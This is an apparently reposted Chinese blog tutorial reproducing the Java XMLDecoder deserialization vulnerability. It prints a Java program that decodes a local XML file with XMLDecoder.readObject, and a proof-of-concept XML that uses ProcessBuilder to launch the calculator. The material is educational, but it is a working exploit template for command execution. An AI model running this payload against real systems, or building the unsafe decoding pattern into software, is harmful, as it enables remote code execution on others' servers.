JAVA漏洞重现:XMLDecoder反序列化漏洞

Posted 下辈子想做头猪

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了JAVA漏洞重现:XMLDecoder反序列化漏洞相关的知识,希望对你有一定的参考价值。

漏洞范围

 XMLDecoder在JDK 1.4~JDK 11中都存在反序列化漏洞安全风险

漏洞重现代码


package com.zhutougg.test;
import java.beans.XMLDecoder;import java.io.BufferedInputStream;import java.io.File;import java.io.FileInputStream;import java.io.FileNotFoundException;
public class Log4JTest { public static void main(String[] args) { try { String path = "d:/test/poc.xml"; File file = new File(path); FileInputStream fis = new FileInputStream(file); BufferedInputStream bis = new BufferedInputStream(fis); XMLDecoder xd = new XMLDecoder(bis); xd.readObject(); xd.close(); } catch (FileNotFoundException e) { e.printStackTrace(); } }}

poc.xml


<?xml version="1.0" encoding="UTF-8"?> <object class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="1"> <void index="0"> <string>calc</string> </void> </array> <void method="start" /> </object>

执行之后,即会弹出计算器

以上是关于JAVA漏洞重现:XMLDecoder反序列化漏洞的主要内容,如果未能解决你的问题,请参考以下文章

xmldecoder反序列化漏洞分析

XMLDecoder反序列化漏洞

XMLDecoder反序列化漏洞检测思考

WebLogic XMLDecoder反序列化漏洞复现

漏洞预警丨Oracle WebLogic XMLDecoder反序列化漏洞

Weblogic XMLDecoder反序列化漏洞(CVE-2017-10271)